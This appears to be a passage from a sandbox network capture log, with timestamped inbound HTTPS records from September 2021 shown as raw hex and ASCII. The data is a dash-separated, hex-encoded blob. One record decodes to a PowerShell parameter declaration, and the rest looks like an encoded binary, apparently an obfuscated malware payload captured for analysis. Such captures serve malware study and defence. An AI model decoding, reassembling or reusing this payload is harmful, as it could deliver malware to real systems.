2021-09-14 19:24:32 UTC	337	IN	Data Raw: 43 44 35 38 44 32 33 41 42 32 2d 33 46 36 32 43 36 44 2d 39 43 41 44 36 45 38 35 46 42 41 35 45 42 45 42 34 33 43 39 34 46 42 31 46 39 32 33 33 34 32 38 32 43 2d 37 34 36 2d 38 37 46 37 34 44 43 42 35 46 34 44 32 34 45 32 36 37 32 41 2d 44 32 38 46 46 32 45 46 44 33 2d 33 41 38 46 36 43 46 42 37 34 41 32 31 42 34 36 39 42 35 34 44 31 34 42 35 41 42 44 45 33 43 31 39 33 43 37 43 37 2d 46 2d 36 39 38 35 33 39 38 46 32 41 35 36 33 42 45 31 34 43 34 45 34 43 2d 38 2d 33 43 39 39 38 38 45 33 34 36 37 41 33 31 36 34 34 44 45 36 33 2d 32 45 39 38 35 42 34 36 43 32 42 46 46 43 36 45 45 34 38 2d 31 35 45 31 38 42 35 35 42 41 36 38 42 39 42 45 43 34 41 38 35 41 44 41 46 36 31 2d 43 39 31 38 33 37 36 39 43 42 41 33 44 31 45 44 32 44 36 2d 45 44 45 37 34 43 46 31 43 Data Ascii: CD58D23AB2-3F62C6D-9CAD6E85FBA5EBEB43C94FB1F92334282C-746-87F74DCB5F4D24E2672A-D28FF2EFD3-3A8F6CFB74A21B469B54D14B5ABDE3C193C7C7-F-6985398F2A563BE14C4E4C-8-3C9988E3467A31644DE63-2E985B46C2BFFC6EE48-15E18B55BA68B9BEC4A85ADAF61-C9183769CBA3D1ED2D6-EDE74CF1C
2021-09-14 19:24:32 UTC	344	IN	Data Raw: 45 37 41 35 39 41 46 33 42 42 32 32 35 37 42 36 2d 41 37 35 34 42 43 43 37 43 32 38 44 44 36 41 34 31 36 46 35 39 31 33 43 34 42 44 33 44 37 44 39 41 42 32 36 34 37 34 44 36 31 43 32 43 45 46 46 41 39 46 32 33 39 2d 44 32 42 34 34 44 33 43 36 34 31 32 46 43 44 35 33 33 42 36 31 44 34 46 41 31 31 37 34 46 32 42 36 36 37 46 2d 45 31 32 33 31 32 31 31 38 42 46 33 43 32 41 32 35 43 45 34 31 31 32 2d 33 44 46 2d 42 34 31 37 37 44 2d 41 34 44 33 45 32 44 37 33 36 36 45 32 42 2d 35 44 42 45 35 2d 34 43 39 45 2d 42 44 43 31 37 38 35 2d 34 45 36 43 37 42 45 2d 33 33 38 37 43 42 38 41 31 42 32 36 35 2d 2d 43 41 32 35 43 46 34 32 32 33 2d 38 41 44 46 38 37 33 37 45 44 32 43 31 45 36 2d 35 36 43 34 2d 46 34 2d 32 32 32 38 46 2d 35 37 35 38 41 38 34 32 43 2d 38 2d 38 Data Ascii: E7A59AF3BB2257B6-A754BCC7C28DD6A416F5913C4BD3D7D9AB26474D61C2CEFFA9F239-D2B44D3C6412FCD533B61D4FA1174F2B667F-E12312118BF3C2A25CE4112-3DF-B4177D-A4D3E2D7366E2B-5DBE5-4C9E-BDC1785-4E6C7BE-3387CB8A1B265--CA25CF4223-8ADF8737ED2C1E6-56C4-F4-2228F-5758A842C-8-8
2021-09-14 19:24:32 UTC	351	IN	Data Raw: 41 32 34 32 34 43 32 41 44 31 45 34 35 33 31 43 34 44 31 34 46 36 31 38 35 2d 45 43 34 31 46 2d 43 34 43 38 39 42 37 34 37 34 43 38 36 36 41 37 36 32 45 32 2d 32 2d 46 44 43 35 2d 37 33 38 37 35 37 33 42 38 36 37 37 42 37 32 38 35 39 41 2d 33 44 38 34 36 38 36 35 37 44 36 32 45 37 38 41 33 39 39 33 2d 39 43 32 44 36 45 43 33 41 45 33 45 35 38 46 41 2d 46 35 39 32 43 39 34 2d 41 34 33 45 45 41 45 41 42 33 41 34 31 31 33 33 38 35 45 46 33 43 45 38 35 46 39 2d 36 2d 44 39 46 46 42 44 34 36 42 35 38 43 36 45 33 39 39 2d 2d 43 31 33 41 37 39 39 32 45 45 34 34 42 31 42 42 45 45 43 46 34 34 36 42 33 41 41 32 43 32 43 36 45 35 43 38 39 44 41 43 39 45 45 32 33 44 32 43 41 39 46 32 34 46 35 44 32 34 2d 2d 44 45 32 31 44 44 44 2d 33 38 43 33 32 36 33 32 44 36 2d 34 Data Ascii: A2424C2AD1E4531C4D14F6185-EC41F-C4C89B7474C866A762E2-2-FDC5-7387573B8677B72859A-3D8468657D62E78A3993-9C2D6EC3AE3E58FA-F592C94-A43EEAEAB3A4113385EF3CE85F9-6-D9FFBD46B58C6E399--C13A7992EE44B1BBEECF446B3AA2C2C6E5C89DAC9EE23D2CA9F24F5D24--DE21DDD-38C32632D6-4
2021-09-14 19:24:32 UTC	359	IN	Data Raw: 43 38 31 45 46 32 35 37 36 46 38 45 35 46 38 39 35 41 34 46 39 46 39 35 31 34 2d 32 34 2d 43 38 33 2d 41 34 33 45 31 37 45 31 37 34 43 42 2d 35 39 37 42 44 37 37 45 44 43 31 39 44 38 32 43 45 2d 2d 45 45 41 35 46 38 41 32 42 34 38 34 43 41 42 42 38 38 46 42 45 34 31 44 32 43 2d 34 43 36 39 2d 44 31 42 42 2d 46 38 43 39 31 31 32 31 32 33 43 38 37 45 36 32 31 45 39 35 46 44 42 37 33 44 34 36 34 34 31 32 38 31 39 33 41 32 44 35 41 32 31 35 46 33 38 37 34 34 2d 41 35 38 42 43 38 33 37 37 38 34 45 43 45 45 36 44 46 32 46 31 43 45 2d 34 41 37 33 45 34 32 42 36 43 34 41 41 39 2d 31 42 39 2d 42 35 39 35 32 32 38 2d 36 46 45 46 38 37 46 2d 46 41 45 33 45 38 43 46 38 2d 41 37 43 37 2d 46 36 41 45 37 43 45 41 31 36 35 35 34 42 44 39 42 43 38 38 41 44 36 34 39 34 2d Data Ascii: C81EF2576F8E5F895A4F9F9514-24-C83-A43E17E174CB-597BD77EDC19D82CE--EEA5F8A2B484CABB88FBE41D2C-4C69-D1BB-F8C9112123C87E621E95FDB73D4644128193A2D5A215F38744-A58BC837784ECEE6DF2F1CE-4A73E42B6C4AA9-1B9-B595228-6FEF87F-FAE3E8CF8-A7C7-F6AE7CEA16554BD9BC88AD6494-
2021-09-14 19:24:32 UTC	366	IN	Data Raw: 45 39 45 35 41 41 42 41 2d 34 34 44 31 38 35 37 41 41 43 31 36 37 44 46 42 42 41 36 45 38 34 38 44 32 36 31 31 35 34 43 42 41 37 36 41 42 31 34 45 45 44 45 45 45 43 32 41 39 45 39 33 38 33 31 36 41 35 31 36 37 36 45 39 44 46 32 45 35 43 42 39 33 39 32 43 33 31 45 42 36 31 34 31 32 43 34 33 41 2d 41 33 45 34 46 46 38 43 34 43 37 31 35 39 31 33 46 2d 44 38 45 35 39 44 36 38 2d 38 37 35 32 36 41 44 38 35 43 32 32 37 46 39 45 41 43 45 37 44 33 42 44 36 34 42 37 45 33 42 39 37 2d 36 34 32 46 34 2d 39 46 31 46 37 36 2d 2d 44 46 42 41 38 33 44 41 38 39 42 35 41 32 34 33 42 42 32 31 41 41 33 35 32 43 32 43 36 39 35 42 43 34 45 2d 46 38 32 33 32 45 39 39 32 31 34 38 35 42 36 2d 33 36 31 45 37 35 35 32 44 41 32 43 33 2d 35 34 2d 32 32 39 34 37 43 2d 43 31 31 35 36 Data Ascii: E9E5AABA-44D1857AAC167DFBBA6E848D261154CBA76AB14EEDEEEC2A9E938316A51676E9DF2E5CB9392C31EB61412C43A-A3E4FF8C4C715913F-D8E59D68-87526AD85C227F9EACE7D3BD64B7E3B97-642F4-9F1F76--DFBA83DA89B5A243BB21AA352C2C695BC4E-F8232E9921485B6-361E7552DA2C3-54-22947C-C1156
2021-09-14 19:24:32 UTC	373	IN	Data Raw: 2d 45 45 39 35 41 39 45 35 39 2d 39 36 34 41 44 43 34 42 45 34 32 36 31 31 45 32 42 38 32 39 41 46 37 41 42 33 46 43 34 36 38 33 43 31 37 41 41 36 33 37 41 45 38 44 46 33 34 34 42 41 31 32 43 31 46 39 44 34 43 36 41 35 35 41 39 42 32 38 45 32 31 2d 42 45 43 34 33 36 46 43 43 46 44 38 35 31 32 34 41 33 41 33 35 38 41 41 44 34 37 31 37 45 37 38 33 39 36 34 43 42 36 44 2d 44 42 38 32 41 37 46 36 39 31 42 33 44 32 34 39 2d 36 46 34 42 37 42 37 46 36 39 33 42 41 38 44 35 41 43 45 45 32 32 41 36 32 46 45 42 32 42 32 42 32 32 35 33 44 44 35 36 39 38 35 38 35 33 45 37 37 43 35 36 42 36 35 45 34 32 32 37 44 37 32 38 31 2d 34 36 41 35 34 32 33 46 37 36 38 34 39 43 34 31 35 42 32 31 46 39 39 37 41 36 35 44 35 34 41 31 42 46 44 46 38 46 35 42 45 43 34 33 39 34 41 35 Data Ascii: -EE95A9E59-964ADC4BE42611E2B829AF7AB3FC4683C17AA637AE8DF344BA12C1F9D4C6A55A9B28E21-BEC436FCCFD85124A3A358AAD4717E783964CB6D-DB82A7F691B3D249-6F4B7B7F693BA8D5ACEE22A62FEB2B2B2253DD56985853E77C56B65E4227D7281-46A5423F76849C415B21F997A65D54A1BFDF8F5BEC4394A5
2021-09-14 19:24:32 UTC	380	IN	Data Raw: 44 42 37 42 32 35 33 35 36 39 46 39 43 42 32 42 46 43 35 31 36 38 32 2d 2d 45 44 43 46 33 45 38 43 46 37 45 39 35 36 45 34 32 46 36 44 42 32 32 36 41 31 39 34 33 44 31 41 46 32 36 37 37 2d 39 36 32 38 35 43 37 38 42 42 42 37 44 37 33 36 31 44 31 39 2d 34 2d 46 34 41 37 34 33 32 37 36 44 35 39 41 35 33 2d 34 42 45 42 43 35 33 44 31 39 43 41 42 33 41 35 37 37 43 39 33 45 46 41 44 31 35 35 33 46 31 37 32 2d 38 43 36 41 36 45 33 35 35 45 43 34 31 41 32 44 45 32 42 37 39 43 37 33 42 38 35 38 43 31 44 38 42 33 31 45 33 37 46 46 33 43 34 33 43 35 31 44 31 35 39 37 37 45 42 38 45 45 44 41 34 42 36 39 37 31 43 45 44 37 37 37 45 43 36 2d 36 38 33 2d 31 42 31 33 31 44 45 46 41 32 38 43 37 42 33 43 35 33 34 37 44 45 36 31 39 43 33 35 45 42 44 32 32 2d 38 42 44 45 42 Data Ascii: DB7B253569F9CB2BFC51682--EDCF3E8CF7E956E42F6DB226A1943D1AF2677-96285C78BBB7D7361D19-4-F4A743276D59A53-4BEBC53D19CAB3A577C93EFAD1553F172-8C6A6E355EC41A2DE2B79C73B858C1D8B31E37FF3C43C51D15977EB8EEDA4B6971CED777EC6-683-1B131DEFA28C7B3C5347DE619C35EBD22-8BDEB
2021-09-14 19:24:32 UTC	387	IN	Data Raw: 42 34 41 43 34 34 41 43 37 31 39 37 42 38 32 2d 2d 31 39 37 31 34 43 46 32 41 31 35 35 32 43 38 46 32 33 2d 43 39 43 38 35 31 2d 41 38 46 39 43 33 38 35 33 41 2d 45 44 42 37 31 37 46 43 45 36 42 35 45 2d 42 32 44 38 32 2d 43 35 35 42 41 42 31 36 2d 35 39 31 37 41 35 34 34 43 33 35 46 43 46 34 2d 38 44 38 38 33 45 46 39 32 34 46 36 43 2d 33 36 31 42 41 46 31 35 42 45 31 44 33 31 39 43 34 35 32 33 32 32 31 37 45 37 45 42 43 44 38 34 37 46 32 39 35 43 36 32 32 46 32 44 38 45 45 35 46 37 44 37 39 36 35 32 42 43 45 37 36 45 43 42 33 37 2d 44 45 34 38 42 44 2d 31 43 39 38 36 45 45 39 46 43 43 36 37 31 31 42 36 33 32 32 44 45 46 32 45 42 44 35 37 35 37 46 44 32 39 45 36 45 32 42 39 44 43 33 34 38 32 32 37 2d 44 38 36 39 32 43 44 41 31 32 37 37 35 35 2d 41 39 39 Data Ascii: B4AC44AC7197B82--19714CF2A1552C8F23-C9C851-A8F9C3853A-EDB717FCE6B5E-B2D82-C55BAB16-5917A544C35FCF4-8D883EF924F6C-361BAF15BE1D319C45232217E7EBCD847F295C622F2D8EE5F7D79652BCE76ECB37-DE48BD-1C986EE9FCC6711B6322DEF2EBD5757FD29E6E2B9DC348227-D8692CDA127755-A99
2021-09-14 19:24:32 UTC	395	IN	Data Raw: 46 44 2d 38 2d 37 31 35 41 33 41 31 36 39 43 45 46 2d 36 35 46 41 44 37 41 36 34 45 45 45 42 32 46 32 36 42 2d 33 38 2d 34 31 41 46 46 42 33 38 43 36 44 31 2d 31 31 43 45 31 35 43 2d 44 34 46 34 34 35 39 39 42 2d 43 31 36 38 2d 44 34 33 31 44 43 41 46 35 41 39 39 44 34 33 37 32 43 38 33 42 31 32 42 2d 43 33 33 32 44 34 33 32 42 46 39 37 39 2d 2d 34 41 43 44 39 31 39 34 46 32 39 32 38 44 2d 43 39 37 44 43 42 45 35 42 34 31 32 42 38 43 38 33 38 44 34 33 44 2d 42 35 36 46 35 43 36 2d 36 33 44 41 41 34 41 39 35 45 44 31 43 46 33 43 39 34 33 45 39 43 42 41 36 35 2d 33 39 37 35 44 36 2d 44 39 31 43 37 39 34 35 33 2d 45 31 39 34 46 36 37 39 34 39 41 41 35 34 38 46 46 46 33 34 31 38 2d 44 31 38 31 32 35 31 2d 32 43 37 37 42 44 45 41 41 41 46 42 35 2d 46 45 43 43 Data Ascii: FD-8-715A3A169CEF-65FAD7A64EEEB2F26B-38-41AFFB38C6D1-11CE15C-D4F44599B-C168-D431DCAF5A99D4372C83B12B-C332D432BF979--4ACD9194F2928D-C97DCBE5B412B8C838D43D-B56F5C6-63DAA4A95ED1CF3C943E9CBA65-3975D6-D91C79453-E194F67949AA548FFF3418-D181251-2C77BDEAAAFB5-FECC
2021-09-14 19:24:32 UTC	402	IN	Data Raw: 45 37 45 39 37 32 44 46 46 45 45 35 36 38 39 2d 39 37 41 37 32 33 33 45 36 37 35 45 37 2d 36 42 42 46 44 46 39 43 45 36 41 39 35 43 41 36 34 41 42 38 31 46 33 36 38 45 33 34 37 41 33 37 45 37 43 31 37 33 36 2d 31 35 34 46 42 31 43 33 38 42 31 39 46 38 41 35 39 36 43 2d 34 43 41 42 43 32 44 32 41 33 33 46 37 32 32 31 43 33 43 45 34 31 41 46 34 41 31 33 36 43 2d 45 43 44 35 45 36 41 43 2d 38 43 45 31 37 39 31 32 45 42 45 45 44 42 33 44 31 34 31 43 35 35 32 42 2d 44 34 33 37 33 41 42 35 36 31 42 44 38 32 38 41 45 2d 46 36 33 39 36 38 42 38 45 33 38 2d 44 43 43 41 45 45 41 46 41 33 2d 42 31 43 36 36 41 32 43 46 35 44 42 33 41 32 32 37 37 39 36 43 41 34 41 35 2d 44 43 43 42 2d 36 41 45 46 44 33 43 2d 34 34 39 32 44 41 36 37 33 36 32 45 2d 44 39 45 37 42 32 41 Data Ascii: E7E972DFFEE5689-97A7233E675E7-6BBFDF9CE6A95CA64AB81F368E347A37E7C1736-154FB1C38B19F8A596C-4CABC2D2A33F7221C3CE41AF4A136C-ECD5E6AC-8CE17912EBEEDB3D141C552B-D4373AB561BD828AE-F63968B8E38-DCCAEEAFA3-B1C66A2CF5DB3A227796CA4A5-DCCB-6AEFD3C-4492DA67362E-D9E7B2A
2021-09-14 19:24:32 UTC	409	IN	Data Raw: 42 38 2d 41 43 43 2d 35 33 39 37 45 39 41 32 43 32 37 33 35 43 38 41 42 41 46 41 2d 38 34 38 36 43 39 42 34 45 39 31 34 39 38 31 33 32 36 45 36 39 42 38 42 33 2d 2d 46 34 41 34 38 35 41 46 36 2d 46 45 43 43 44 42 32 45 43 35 36 41 31 34 41 42 39 37 37 42 46 45 32 45 38 37 44 31 38 32 41 33 2d 44 2d 37 43 2d 36 31 32 36 45 32 39 46 44 31 46 36 43 45 44 33 45 39 42 36 32 33 33 31 33 33 34 43 39 32 33 33 31 44 32 35 31 46 44 2d 43 46 43 45 38 33 31 45 45 37 41 37 32 33 41 42 44 44 36 45 2d 32 37 42 46 42 42 32 41 43 31 45 45 37 32 37 33 32 2d 33 33 45 31 2d 45 33 34 37 44 33 38 2d 33 34 34 42 42 38 31 38 37 32 33 44 41 36 46 46 39 44 38 37 41 45 34 46 34 36 43 36 2d 42 43 38 39 39 35 33 39 31 31 36 34 43 38 37 43 36 41 34 34 45 35 35 37 46 44 34 36 43 34 36 Data Ascii: B8-ACC-5397E9A2C2735C8ABAFA-8486C9B4E914981326E69B8B3--F4A485AF6-FECCDB2EC56A14AB977BFE2E87D182A3-D-7C-6126E29FD1F6CED3E9B62331334C92331D251FD-CFCE831EE7A723ABDD6E-27BFBB2AC1EE72732-33E1-E347D38-344BB818723DA6FF9D87AE4F46C6-BC8995391164C87C6A44E557FD46C46
2021-09-14 19:24:32 UTC	416	IN	Data Raw: 2d 36 39 2d 36 65 2d 36 34 2d 36 39 2d 36 65 2d 36 37 2d 32 38 2d 32 39 2d 35 64 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 35 62 2d 34 66 2d 37 35 2d 37 34 2d 37 30 2d 37 35 2d 37 34 2d 35 34 2d 37 39 2d 37 30 2d 36 35 2d 32 38 2d 35 62 2d 36 32 2d 37 39 2d 37 34 2d 36 35 2d 35 62 2d 35 64 2d 35 64 2d 32 39 2d 35 64 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 37 30 2d 36 31 2d 37 32 2d 36 31 2d 36 64 2d 32 38 2d 30 61 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 32 30 2d 35 62 2d 35 30 2d 36 31 2d 37 32 2d 36 31 2d 36 64 2d 36 35 2d 37 34 2d 36 35 2d 37 32 2d 32 38 2d 34 64 2d 36 31 2d 36 65 2d 36 34 2d 36 31 2d 37 34 2d 36 66 2d 37 32 2d 37 39 2d 33 64 2d 32 34 2d 37 34 2d 37 32 2d 37 35 2d 36 35 2d 32 39 2d 35 64 2d 32 30 Data Ascii: -69-6e-64-69-6e-67-28-29-5d-0a-20-20-20-20-5b-4f-75-74-70-75-74-54-79-70-65-28-5b-62-79-74-65-5b-5d-5d-29-5d-0a-20-20-20-20-70-61-72-61-6d-28-0a-20-20-20-20-20-20-20-20-5b-50-61-72-61-6d-65-74-65-72-28-4d-61-6e-64-61-74-6f-72-79-3d-24-74-72-75-65-29-5d-20
2021-09-14 19:24:32 UTC	424	IN	Data Raw: 33 31 2d 33 30 2d 33 36 2d 33 31 2d 34 36 2d 33 32 2d 33 39 2d 33 39 2d 33 34 2d 33 31 2d 33 33 2d 33 30 2d 33 37 2d 33 31 2d 33 36 2d 33 31 2d 33 33 2d 33 30 2d 33 38 2d 33 37 2d 34 35 2d 33 30 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 34 2d 33 30 2d 33 39 2d 33 37 2d 34 32 2d 33 30 2d 34 32 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 34 2d 33 31 2d 33 31 2d 33 30 2d 33 37 2d 33 31 2d 34 31 2d 34 34 2d 33 36 2d 33 31 2d 34 31 2d 34 34 2d 33 36 2d 33 31 2d 33 32 2d 33 30 2d 33 38 2d 33 31 2d 34 31 2d 33 31 2d 33 32 2d 33 30 2d 33 30 2d 33 36 2d 34 36 2d 33 32 2d 33 34 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 31 2d 33 36 2d 34 36 2d 34 35 2d 33 30 2d 33 31 2d 33 31 2d 33 33 2d 33 31 2d 33 35 2d 33 31 2d 33 31 2d Data Ascii: 31-30-36-31-46-32-39-39-34-31-33-30-37-31-36-31-33-30-38-37-45-30-38-30-30-30-30-30-34-30-39-37-42-30-42-30-30-30-30-30-34-31-31-30-37-31-41-44-36-31-41-44-36-31-32-30-38-31-41-31-32-30-30-36-46-32-34-30-30-30-30-30-36-31-36-46-45-30-31-31-33-31-35-31-31-
2021-09-14 19:24:32 UTC	431	IN	Data Raw: 30 2d 33 30 2d 33 30 2d 33 30 2d 33 37 2d 33 30 2d 33 32 2d 33 30 2d 33 37 2d 33 37 2d 34 35 2d 34 35 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 34 2d 34 34 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 36 2d 34 35 2d 34 35 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 34 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 31 2d 33 36 2d 34 36 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 33 2d 33 39 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 36 2d 33 32 2d 33 30 2d 33 36 2d 34 31 2d 34 35 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 32 2d 33 38 2d 33 32 2d 34 36 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 Data Ascii: 0-30-30-30-37-30-32-30-37-37-45-45-30-30-30-30-32-38-34-44-30-30-30-30-30-36-32-30-36-45-45-38-30-30-30-30-32-38-34-33-30-30-30-30-30-36-32-30-31-36-46-33-30-30-30-30-32-38-33-39-30-30-30-30-30-36-32-30-36-41-45-31-30-30-30-30-32-38-32-46-30-30-30-30-30-3
2021-09-14 19:24:32 UTC	438	IN	Data Raw: 2d 33 31 2d 34 33 2d 33 36 2d 33 33 2d 33 36 2d 33 36 2d 33 31 2d 34 33 2d 33 36 2d 33 33 2d 33 32 2d 34 32 2d 33 34 2d 33 39 2d 33 32 2d 33 38 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 30 2d 33 36 2d 33 32 2d 33 38 2d 33 31 2d 33 37 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 34 32 2d 33 36 2d 33 31 2d 33 31 2d 33 32 2d 33 30 2d 33 32 2d 33 32 2d 33 38 2d 33 31 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 33 33 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 33 2d 33 36 2d 33 30 2d 33 32 2d 33 32 2d 34 32 2d 33 30 2d 34 33 2d 33 32 2d 34 32 2d 33 34 2d 33 35 2d 33 33 Data Ascii: -31-43-36-33-36-36-31-43-36-33-32-42-34-39-32-38-31-30-30-30-30-30-30-41-30-36-32-38-31-37-30-30-30-30-30-41-32-42-36-31-31-32-30-32-32-38-31-38-30-30-30-30-30-41-32-33-30-30-30-30-30-30-30-30-30-30-30-30-30-30-30-30-33-36-30-32-32-42-30-43-32-42-34-35-33
2021-09-14 19:24:32 UTC	445	IN	Data Raw: 33 38 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 34 32 2d 34 33 2d 34 36 2d 33 38 2d 33 37 2d 33 32 2d 33 30 2d 33 33 2d 33 32 2d 33 30 2d 34 32 2d 33 36 2d 34 36 2d 33 38 2d 33 37 2d 33 32 2d 33 30 2d 33 33 2d 33 35 2d 33 39 2d 33 32 2d 33 30 2d 33 33 2d 33 32 2d 33 33 2d 33 39 2d 33 34 2d 34 31 2d 33 31 2d 33 33 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 37 2d 33 37 2d 33 37 2d 33 36 2d 34 32 2d 33 35 2d 33 32 2d 33 35 2d 33 35 2d 33 38 2d 33 32 2d 33 30 2d 33 36 2d 34 31 2d 33 33 2d 34 34 2d 33 36 2d 34 32 2d 33 31 2d 33 32 2d 33 35 2d 33 39 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 34 35 2d 33 32 2d 34 34 2d 33 32 2d 34 32 2d 33 36 2d 33 31 2d 33 36 2d 33 32 2d 33 30 2d 33 31 2d 34 35 2d 33 31 2d 34 34 2d 33 34 2d 33 39 2d 34 35 2d 33 39 2d 33 35 2d 33 38 2d Data Ascii: 38-36-35-32-30-42-43-46-38-37-32-30-33-32-30-42-36-46-38-37-32-30-33-35-39-32-30-33-32-33-39-34-41-31-33-36-36-32-30-37-37-37-36-42-35-32-35-35-38-32-30-36-41-33-44-36-42-31-32-35-39-36-36-32-30-45-32-44-32-42-36-31-36-32-30-31-45-31-44-34-39-45-39-35-38-
2021-09-14 19:24:32 UTC	453	IN	Data Raw: 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 33 2d 33 38 2d 34 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 31 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 37 2d 33 39 2d 33 32 2d 34 33 2d 34 36 2d 34 36 2d 33 32 2d 33 37 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 32 2d 33 35 2d 33 36 2d 33 31 2d 34 31 2d 33 38 2d 33 30 2d 33 31 2d 33 35 2d 33 39 2d 33 32 2d 33 30 2d 33 32 2d 33 36 2d 34 35 2d 33 38 2d 34 36 2d 34 36 2d 33 32 2d 33 32 2d 33 35 2d 33 38 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 37 2d 33 30 2d 34 31 2d 33 35 2d 34 31 2d 33 37 2d 33 30 2d 33 36 2d 33 35 2d 33 39 2d 33 32 2d 33 38 2d 33 31 2d 34 36 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 34 31 2d 33 32 2d 34 32 2d 33 33 2d 33 39 2d 33 31 2d 33 Data Ascii: 0-30-30-30-30-41-33-38-41-30-30-30-30-30-30-30-31-32-30-30-32-30-37-39-32-43-46-46-32-37-36-36-32-30-32-35-36-31-41-38-30-31-35-39-32-30-32-36-45-38-46-46-32-32-35-38-36-36-32-30-37-30-41-35-41-37-30-36-35-39-32-38-31-46-30-30-30-30-30-41-32-42-33-39-31-3
2021-09-14 19:24:32 UTC	460	IN	Data Raw: 2d 34 36 2d 34 35 2d 33 30 2d 33 39 2d 33 30 2d 33 32 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 34 36 2d 33 36 2d 33 31 2d 33 32 2d 34 35 2d 34 36 2d 34 32 2d 34 34 2d 33 36 2d 33 36 2d 33 32 2d 33 30 2d 33 32 2d 34 35 2d 33 35 2d 33 37 2d 34 35 2d 33 30 2d 34 36 2d 33 38 2d 33 35 2d 33 38 2d 33 32 2d 33 30 2d 34 32 2d 34 36 2d 33 30 2d 33 32 2d 33 30 2d 34 34 2d 34 34 2d 34 34 2d 33 36 2d 33 31 2d 33 36 2d 33 36 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 34 32 2d 33 31 2d 34 34 2d 34 33 2d 34 34 2d 33 32 2d 33 31 2d 33 38 2d 33 36 2d 33 31 2d 33 36 2d 33 35 2d 33 32 2d 33 30 2d 33 34 2d 33 37 2d 33 39 2d 34 31 2d 33 32 2d 34 35 2d 34 36 2d 34 36 2d 33 35 2d 33 38 2d 33 35 2d 34 36 2d 33 39 2d 33 31 2d 34 36 2d 34 35 2d 33 30 2d 33 39 2d 33 30 2d 33 32 2d 33 30 Data Ascii: -46-45-30-39-30-32-30-30-32-30-46-36-31-32-45-46-42-44-36-36-32-30-32-45-35-37-45-30-46-38-35-38-32-30-42-46-30-32-30-44-44-44-36-31-36-36-36-35-32-30-42-31-44-43-44-32-31-38-36-31-36-35-32-30-34-37-39-41-32-45-46-46-35-38-35-46-39-31-46-45-30-39-30-32-30
2021-09-14 19:24:32 UTC	467	IN	Data Raw: 33 34 2d 33 30 2d 33 30 2d 34 34 2d 33 37 2d 33 30 2d 33 32 2d 33 33 2d 33 36 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 32 2d 34 34 2d 34 32 2d 33 30 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 33 2d 33 35 2d 33 30 2d 33 32 2d 34 36 2d 33 32 2d 33 30 2d 33 31 2d 33 33 2d 33 31 2d 33 30 2d 33 30 2d 34 32 2d 33 35 2d 33 30 2d 33 30 2d 34 35 2d 34 33 2d 33 30 2d 33 32 2d 33 33 2d 33 36 2d 33 30 2d 33 30 2d 34 32 2d 34 35 2d 33 30 2d 33 30 2d 34 36 2d 33 30 2d 33 30 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 34 33 2d 33 30 2d 33 30 2d 33 30 2d 34 36 2d 33 32 2d 33 30 2d 33 31 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 30 2d 33 38 2d 33 30 2d 33 30 2d 33 30 2d 33 39 2d 33 31 2d 33 32 2d 33 30 2d 34 32 2d 33 35 2d Data Ascii: 34-30-30-44-37-30-32-33-36-30-30-42-45-30-32-44-42-30-32-30-31-30-30-43-35-30-32-46-32-30-31-33-31-30-30-42-35-30-30-45-43-30-32-33-36-30-30-42-45-30-30-46-30-30-32-30-31-30-30-43-30-30-30-46-32-30-31-30-30-30-30-30-30-30-30-38-30-30-30-39-31-32-30-42-35-
